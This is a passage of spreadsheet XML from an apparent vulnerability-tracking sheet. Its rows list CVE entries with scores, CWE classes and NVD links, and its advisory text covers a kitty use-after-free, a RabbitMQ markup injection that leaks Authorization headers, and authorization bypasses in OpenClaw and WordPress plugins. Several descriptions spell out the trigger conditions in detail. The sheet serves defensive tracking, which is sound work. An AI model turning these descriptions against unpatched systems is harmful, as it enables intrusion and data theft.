          <t>Use After Free in the drag source path of the drag and drop protocol in kitty from 0.47.0 before 0.49.0 allows a program writing to the terminal to cause the terminal to read from and write to freed heap memory, because drag_remote_file_data() in kitty/dnd.c holds a DragRemoteItem pointer into an array it does not own, calls toplevel_data_for_drag() or subdir_data_for_drag(), and then continues to use that pointer. Those helpers, and add_payload() and populate_dir_entries() which they call, report errors through the abrt() macro, which expands to cancel_drag() followed by a plain return, and cancel_drag() calls drag_free_offer(), which frees the array the pointer refers to. The helpers return void, so the caller receives no indication that the teardown happened, and proceeds to call all_children_complete() on the freed pointer, which dereferences it, and then to write through it. That dereference is guarded by a local flag that is set when the request carries no payload and announces no further data, which is the same condition that selects the finalisation block of add_payload(), so the error paths in that block reach it: a create that fails because an entry of the same name already exists, because the client may declare two entries with one name and the create operations use O_CREAT with O_EXCL and symlinkat(), a mkdirat() failure other than EEXIST, and the directory entry allocation paths. Both branches reach it. In the top level branch the caller's pointer is never cleared, so clearing the owning structure's own pointers during teardown does not help. In the sub directory branch subdir_data_for_drag() sets the caller's pointer to NULL on entry and assigns it only after its own last error path, so its own aborts leave the caller with NULL and are stopped by a null check, but it then calls add_payload() with that pointer set, and an abort there leaves the caller holding a freed child node inside the item tree, which drag_free_offer() frees by recursion. This results in undefined behaviour in the terminal process, reachable from the byte stream of any program running in the window.</t>
        </is>
      </c>
      <c r="T394" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-95834</t>
        </is>
      </c>
    </row>
    <row r="395">
      <c r="A395" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B395" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C395" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-67421</t>
        </is>
      </c>
      <c r="D395" s="5" t="n">
        <v>4.5</v>
      </c>
      <c r="E395" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F395" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G395" s="5" t="inlineStr"/>
      <c r="H395" s="5" t="inlineStr"/>
      <c r="I395" s="5" t="inlineStr"/>
      <c r="J395" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K395" s="5" t="inlineStr"/>
      <c r="L395" s="5" t="inlineStr"/>
      <c r="M395" s="5" t="inlineStr"/>
      <c r="N395" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O395" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P395" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q395" s="5" t="inlineStr"/>
      <c r="R395" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="S395" s="5" t="inlineStr">
        <is>
          <t>RabbitMQ is a messaging and streaming broker. From 3.13.0 until 3.13.19, 4.0.24, 4.1.15, 4.2.10, and 4.3.5, RabbitMQ Management rendered an AMQP authorization-error reason containing an attacker-controlled queue name as HTML when the OAuth management UI was enabled. Exploitation requires an attacker with queue configure permission, a management administrator who can see but cannot read that queue, and the administrator clicking Get Message(s). A queue name containing a base element can then retarget the automatic relative refresh because the Content Security Policy omits base-uri and connect-src, and an attacker endpoint that permits the management origin through CORS can receive the victim's Authorization header. This issue is fixed in versions 3.13.19, 4.0.24, 4.1.15, 4.2.10, and 4.3.5.</t>
        </is>
      </c>
      <c r="T395" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-67421</t>
        </is>
      </c>
    </row>
    <row r="396">
      <c r="A396" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B396" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C396" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100505</t>
        </is>
      </c>
      <c r="D396" s="5" t="n">
        <v>4.4</v>
      </c>
      <c r="E396" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F396" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G396" s="5" t="inlineStr"/>
      <c r="H396" s="5" t="inlineStr"/>
      <c r="I396" s="5" t="inlineStr"/>
      <c r="J396" s="5" t="inlineStr"/>
      <c r="K396" s="5" t="inlineStr"/>
      <c r="L396" s="5" t="inlineStr"/>
      <c r="M396" s="5" t="inlineStr"/>
      <c r="N396" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O396" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="P396" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="Q396" s="5" t="inlineStr"/>
      <c r="R396" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="S396" s="5" t="inlineStr">
        <is>
          <t>Ghidra versions 11.2 through 12.1.4 contain a heap out-of-bounds read vulnerability in StringManager::getCodepoint when decoding multi-byte UTF-8, UTF-16, or UTF-32 characters without validating remaining buffer length. Attackers can craft malicious binaries with constant byte stores ending in multi-byte lead units to trigger out-of-bounds reads that crash the decompiler or leak adjacent heap memory into decompiled output.</t>
        </is>
      </c>
      <c r="T396" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100505</t>
        </is>
      </c>
    </row>
    <row r="397">
      <c r="A397" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B397" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C397" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100305</t>
        </is>
      </c>
      <c r="D397" s="5" t="n">
        <v>4.3</v>
      </c>
      <c r="E397" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F397" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G397" s="5" t="inlineStr"/>
      <c r="H397" s="5" t="inlineStr"/>
      <c r="I397" s="5" t="inlineStr"/>
      <c r="J397" s="5" t="inlineStr"/>
      <c r="K397" s="5" t="inlineStr"/>
      <c r="L397" s="5" t="inlineStr"/>
      <c r="M397" s="5" t="inlineStr"/>
      <c r="N397" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O397" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P397" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q397" s="5" t="inlineStr"/>
      <c r="R397" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="S397" s="5" t="inlineStr">
        <is>
          <t>TDuck survey form through 6.0 fails to enforce form fill-in restrictions on the authenticated submission endpoint POST /user/form/data/create. Authenticated attackers who know a form's key can submit unlimited entries to any form, bypassing publish status, time window, quota, and per-IP restrictions to falsify collected results.</t>
        </is>
      </c>
      <c r="T397" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100305</t>
        </is>
      </c>
    </row>
    <row r="398">
      <c r="A398" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B398" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C398" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100525</t>
        </is>
      </c>
      <c r="D398" s="5" t="n">
        <v>4.3</v>
      </c>
      <c r="E398" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F398" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G398" s="5" t="inlineStr"/>
      <c r="H398" s="5" t="inlineStr"/>
      <c r="I398" s="5" t="inlineStr"/>
      <c r="J398" s="5" t="inlineStr">
        <is>
          <t>gin, rust</t>
        </is>
      </c>
      <c r="K398" s="5" t="inlineStr"/>
      <c r="L398" s="5" t="inlineStr"/>
      <c r="M398" s="5" t="inlineStr"/>
      <c r="N398" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O398" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="P398" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="Q398" s="5" t="inlineStr"/>
      <c r="R398" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="S398" s="5" t="inlineStr">
        <is>
          <t>The OpenClaw Prometheus diagnostics plugin (@openclaw/diagnostics-prometheus) before version 2026.9.3 does not enforce the operator.read scope on its authenticated metrics endpoint. In deployments using an identity-bearing Gateway authentication mode such as trusted-proxy, a caller whose effective role has no read scope can retrieve the diagnostics document even though ordinary read methods reject the same identity, disclosing operational metrics to an authenticated profile intentionally limited below read access. Shared-secret Gateway callers already hold the documented full operator scope and are not affected. The issue is fixed in 2026.9.3; as a workaround, disable the Prometheus endpoint or ensure every identity that can reach it is intended to hold operator.read.</t>
        </is>
      </c>
      <c r="T398" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100525</t>
        </is>
      </c>
    </row>
    <row r="399">
      <c r="A399" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B399" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C399" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100553</t>
        </is>
      </c>
      <c r="D399" s="5" t="n">
        <v>4.3</v>
      </c>
      <c r="E399" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F399" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G399" s="5" t="inlineStr"/>
      <c r="H399" s="5" t="inlineStr"/>
      <c r="I399" s="5" t="inlineStr"/>
      <c r="J399" s="5" t="inlineStr">
        <is>
          <t>requests</t>
        </is>
      </c>
      <c r="K399" s="5" t="inlineStr"/>
      <c r="L399" s="5" t="inlineStr"/>
      <c r="M399" s="5" t="inlineStr"/>
      <c r="N399" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O399" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="P399" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="Q399" s="5" t="inlineStr"/>
      <c r="R399" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="S399" s="5" t="inlineStr">
        <is>
          <t>OpenClaw versions &gt;= 2026.6.9 and &lt; 2026.8.1 do not declare the native chatId parameter as a delivery target in the Feishu unpin feature, so unpin requests can bypass the shared same-provider cross-context target check. When tools.message.crossContext.allowWithinProvider is disabled, an admitted (authenticated) sender can remove a pin from another Feishu group that the sender and the configured account are otherwise permitted to access, bypassing the intended cross-context message mutation policy. Feishu membership and group authorization still apply, and the demonstrated impact is limited to message mutation (pin removal). The issue is fixed in 2026.8.1.</t>
        </is>
      </c>
      <c r="T399" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100553</t>
        </is>
      </c>
    </row>
    <row r="400">
      <c r="A400" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B400" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C400" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100583</t>
        </is>
      </c>
      <c r="D400" s="5" t="n">
        <v>4.3</v>
      </c>
      <c r="E400" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F400" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G400" s="5" t="inlineStr"/>
      <c r="H400" s="5" t="inlineStr"/>
      <c r="I400" s="5" t="inlineStr"/>
      <c r="J400" s="5" t="inlineStr">
        <is>
          <t>rust</t>
        </is>
      </c>
      <c r="K400" s="5" t="inlineStr"/>
      <c r="L400" s="5" t="inlineStr"/>
      <c r="M400" s="5" t="inlineStr"/>
      <c r="N400" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O400" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="P400" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="Q400" s="5" t="inlineStr"/>
      <c r="R400" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="S400" s="5" t="inlineStr">
        <is>
          <t>OpenClaw Discord versions before 2026.7.1 contain an authorization bypass vulnerability in guild metadata read actions that allows lower-trust senders to retrieve information excluded by channel allowlists. Attackers can bypass the configured Discord read-target policy to access guild metadata from servers or channels outside the operator's allowlist.</t>
        </is>
      </c>
      <c r="T400" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100583</t>
        </is>
      </c>
    </row>
    <row r="401">
      <c r="A401" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B401" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C401" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100590</t>
        </is>
      </c>
      <c r="D401" s="5" t="n">
        <v>4.3</v>
      </c>
      <c r="E401" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F401" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G401" s="5" t="inlineStr"/>
      <c r="H401" s="5" t="inlineStr"/>
      <c r="I401" s="5" t="inlineStr"/>
      <c r="J401" s="5" t="inlineStr"/>
      <c r="K401" s="5" t="inlineStr"/>
      <c r="L401" s="5" t="inlineStr"/>
      <c r="M401" s="5" t="inlineStr"/>
      <c r="N401" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O401" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="P401" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="Q401" s="5" t="inlineStr"/>
      <c r="R401" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="S401" s="5" t="inlineStr">
        <is>
          <t>OpenClaw before 2026.7.1 contains an authorization bypass vulnerability in the /voice set command that allows non-owner external-channel senders to persist Gateway voice configuration. Attackers with command access can change the voice used by Talk responses for the configured provider, affecting configuration integrity without exposing credentials or granting additional host capabilities.</t>
        </is>
      </c>
      <c r="T401" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100590</t>
        </is>
      </c>
    </row>
    <row r="402">
      <c r="A402" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B402" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C402" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-19775</t>
        </is>
      </c>
      <c r="D402" s="5" t="n">
        <v>4.3</v>
      </c>
      <c r="E402" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F402" s="5" t="inlineStr">
        <is>
          <t>security@wordfence.com</t>
        </is>
      </c>
      <c r="G402" s="5" t="inlineStr"/>
      <c r="H402" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I402" s="5" t="inlineStr"/>
      <c r="J402" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K402" s="5" t="inlineStr"/>
      <c r="L402" s="5" t="inlineStr"/>
      <c r="M402" s="5" t="inlineStr"/>
      <c r="N402" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O402" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P402" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q402" s="5" t="inlineStr"/>
      <c r="R402" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="S402" s="5" t="inlineStr">
        <is>
          <t>The OpenStation — Desktop Windows, Dock &amp; Virtual Desktops for WP Admin plugin for WordPress is vulnerable to authorization bypass in all versions up to, and including, 1.1.7. This is due to the plugin not properly verifying that a user is authorized to perform an action. This makes it possible for authenticated attackers, with custom-level access and above, to read the title, status, date, permalink, and a 300-character content excerpt of any private, draft, pending, or future post, as well as the content and AI-moderation verdicts of unapproved and spam comments. Any authenticated user with the 'read' capability can self-enable the required AI feature by visiting the /openstation/ portal and toggling their own ai.enabled setting via the POST /desktop-mode/v1/os-settings endpoint, removing any practical barrier to exploitation.</t>
        </is>
      </c>
      <c r="T402" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-19775</t>
        </is>
      </c>
    </row>
    <row r="403">
      <c r="A403" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B403" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C403" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-6103</t>
        </is>
      </c>
      <c r="D403" s="5" t="n">
        <v>4.3</v>
      </c>
      <c r="E403" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F403" s="5" t="inlineStr">
        <is>
          <t>security@php.net</t>
        </is>
      </c>
      <c r="G403" s="5" t="inlineStr"/>
      <c r="H403" s="5" t="inlineStr"/>
      <c r="I403" s="5" t="inlineStr"/>
      <c r="J403" s="5" t="inlineStr"/>
      <c r="K403" s="5" t="inlineStr"/>
      <c r="L403" s="5" t="inlineStr"/>
      <c r="M403" s="5" t="inlineStr"/>
      <c r="N403" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O403" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P403" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q403" s="5" t="inlineStr"/>
      <c r="R403" s="5" t="inlineStr">
        <is>
          <t>CWE-190</t>
        </is>
      </c>
      <c r="S403" s="5" t="inlineStr">
        <is>
          <t>phar_tar_number() parses the octal size field of a TAR header into a uint32_t with no overflow check. The field is 11 octal digits wide and holds values up to 0x1FFFFFFFF, so a size above 0xFFFFFFFF silently wraps. The parser then skips the wrong number of data blocks and interprets attacker-controlled file content as the next TAR header, which lets a crafted archive inject entries that PharData reports and extracts as if they were genuine.</t>
        </is>
      </c>
      <c r="T403" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-6103</t>
        </is>
      </c>
    </row>
    <row r="404">
      <c r="A404" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B404" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C404" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-91769</t>
        </is>
      </c>
      <c r="D404" s="5" t="n">
        <v>4.3</v>
      </c>
      <c r="E404" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F404" s="5" t="inlineStr">
        <is>
          <t>security@php.net</t>
        </is>
      </c>
      <c r="G404" s="5" t="inlineStr"/>
      <c r="H404" s="5" t="inlineStr"/>
      <c r="I404" s="5" t="inlineStr"/>
      <c r="J404" s="5" t="inlineStr">
        <is>
          <t>openssl, php, rust, hp</t>
        </is>
      </c>
      <c r="K404" s="5" t="inlineStr"/>
      <c r="L404" s="5" t="inlineStr"/>
      <c r="M404" s="5" t="inlineStr"/>
      <c r="N404" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O404" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P404" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q404" s="5" t="inlineStr"/>
      <c r="R404" s="5" t="inlineStr">
        <is>
          <t>CWE-297</t>
        </is>
      </c>
      <c r="S404" s="5" t="inlineStr">
        <is>
          <t>PHP's OpenSSL stream peer verification checks the certificate's subjectAltName entries first and, whenever no entry matches, falls back to the Common Name. RFC 6125 requires the CN to be ignored once the certificate presents any service identity, so a certificate carrying a non-matching DNS SAN was still accepted when its CN matched the requested peer_name. A certificate trusted by the client for one name can therefore be used to impersonate another.</t>
        </is>
      </c>
      <c r="T404" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-91769</t>
        </is>
      </c>
    </row>
    <row r="405">
      <c r="A405" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B405" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C405" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92829</t>
        </is>
      </c>
      <c r="D405" s="5" t="n">
        <v>4.3</v>
      </c>
      <c r="E405" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F405" s="5" t="inlineStr">
        <is>
          <t>security@wordfence.com</t>
        </is>
      </c>
      <c r="G405" s="5" t="inlineStr"/>
      <c r="H405" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I405" s="5" t="inlineStr"/>
      <c r="J405" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K405" s="5" t="inlineStr"/>
      <c r="L405" s="5" t="inlineStr"/>
      <c r="M405" s="5" t="inlineStr"/>
      <c r="N405" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O405" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P405" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q405" s="5" t="inlineStr"/>
      <c r="R405" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="S405" s="5" t="inlineStr">
        <is>
          <t>The Blog2Social: Social Media Auto Post &amp; Scheduler plugin for WordPress is vulnerable to authorization bypass in all versions up to, and including, 9.1.0. This is due to the plugin not properly verifying that a user is authorized to perform an action. This makes it possible for authenticated attackers, with contributor-level access and above, to view, modify, or delete other users' Blog2Social records, including disclosing another user's network authentication IDs and scheduled post content, overwriting Open Graph and Twitter Card post metadata on posts they do not own, rebinding another user's social-network authorization, and mass-hiding all users' scheduled posts sitewide. The plugin's b2s_security_nonce is emitted on the post-edit meta box, which Contributors can render, making the nonce available to any authenticated user at that role level or above.</t>
        </is>
      </c>
      <c r="T405" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92829</t>
        </is>
      </c>
    </row>
    <row r="406">
      <c r="A406" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B406" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C406" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97469</t>
        </is>
      </c>
      <c r="D406" s="5" t="n">
        <v>4.3</v>
      </c>
      <c r="E406" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F406" s="5" t="inlineStr">
        <is>
          <t>f86ef6dc-4d3a-42ad-8f28-e6d5547a5007</t>
        </is>
      </c>
      <c r="G406" s="5" t="inlineStr"/>
      <c r="H406" s="5" t="inlineStr"/>
      <c r="I406" s="5" t="inlineStr"/>
      <c r="J406" s="5" t="inlineStr">
        <is>
          <t>postgresql</t>
        </is>
      </c>
      <c r="K406" s="5" t="inlineStr"/>
      <c r="L406" s="5" t="inlineStr"/>
      <c r="M406" s="5" t="inlineStr"/>
      <c r="N406" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O406" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P406" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q406" s="5" t="inlineStr"/>
      <c r="R406" s="5" t="inlineStr">
        <is>
          <t>CWE-328</t>
        </is>
      </c>
      <c r="S406" s="5" t="inlineStr">
        <is>
          <t>PostgreSQL Anonymizer contains a vulnerability that allows unprivileged masked users to repeatedly call the anon.hash() function and collects (seed, hash_output) pairs to perform an offline brute-force attack and deduce the salt. A masked role can run a RESTRICTED function when the call is placed inside the sub-select. The problem is resolved in PostgreSQL Anonymizer 3.2.3 and later versions</t>
        </is>
      </c>
      <c r="T406" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97469</t>
        </is>
      </c>
    </row>
    <row r="407">
      <c r="A407" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B407" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C407" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100554</t>
        </is>
      </c>
      <c r="D407" s="5" t="n">
        <v>4.2</v>
      </c>
      <c r="E407" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F407" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G407" s="5" t="inlineStr"/>
      <c r="H407" s="5" t="inlineStr"/>
      <c r="I407" s="5" t="inlineStr"/>
      <c r="J407" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K407" s="5" t="inlineStr"/>
      <c r="L407" s="5" t="inlineStr"/>
      <c r="M407" s="5" t="inlineStr"/>
      <c r="N407" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O407" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="P407" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="Q407" s="5" t="inlineStr"/>
      <c r="R407" s="5" t="inlineStr">
        <is>
          <t>CWE-613</t>
        </is>
      </c>
      <c r="S407" s="5" t="inlineStr">
        <is>
          <t>OpenClaw (npm package 'openclaw') versions &gt;= 2026.5.12 and &lt; 2026.8.1 do not immediately invalidate Canvas HTTP authorization when a paired node is revoked. Node revocation invalidates the WebSocket client, but Canvas HTTP authorization continues to accept and renew the previously granted capability until WebSocket close cleanup completes. As a result, a revoked paired node can continue exercising its Canvas capability against the capability's configured routes during the close grace period. The issue is fixed in 2026.8.1; as a workaround, restart the Gateway after revoking a node that has Canvas access.</t>
        </is>
      </c>
      <c r="T407" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100554</t>
        </is>
      </c>
    </row>
    <row r="408">
      <c r="A408" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B408" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C408" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-88848</t>
        </is>
      </c>
      <c r="D408" s="5" t="n">
        <v>4.2</v>
      </c>
      <c r="E408" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F408" s="5" t="inlineStr">
        <is>
          <t>contact@wpscan.com</t>
        </is>
      </c>
      <c r="G408" s="5" t="inlineStr"/>
      <c r="H408" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I408" s="5" t="inlineStr"/>
      <c r="J408" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K408" s="5" t="inlineStr"/>
      <c r="L408" s="5" t="inlineStr"/>
      <c r="M408" s="5" t="inlineStr"/>
      <c r="N408" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O408" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P408" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q408" s="5" t="inlineStr"/>
      <c r="R408" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="S408" s="5" t="inlineStr">
        <is>
          <t>The MasterStudy LMS WordPress plugin from 1.9 before 3.7.50 does not verify that a course a member asks to enrol in is covered by their membership plan, nor that the plan identifier submitted with the request is one they actually hold, allowing any member to enrol themselves into restricted paid courses outside their plan and beyond the number of courses it entitles them to.</t>
        </is>
      </c>
      <c r="T408" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-88848</t>
        </is>
      </c>
    </row>
    <row r="409">
      <c r="A409" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B409" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C409" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78394</t>
        </is>
      </c>
      <c r="D409" s="5" t="n">
        <v>4.1</v>
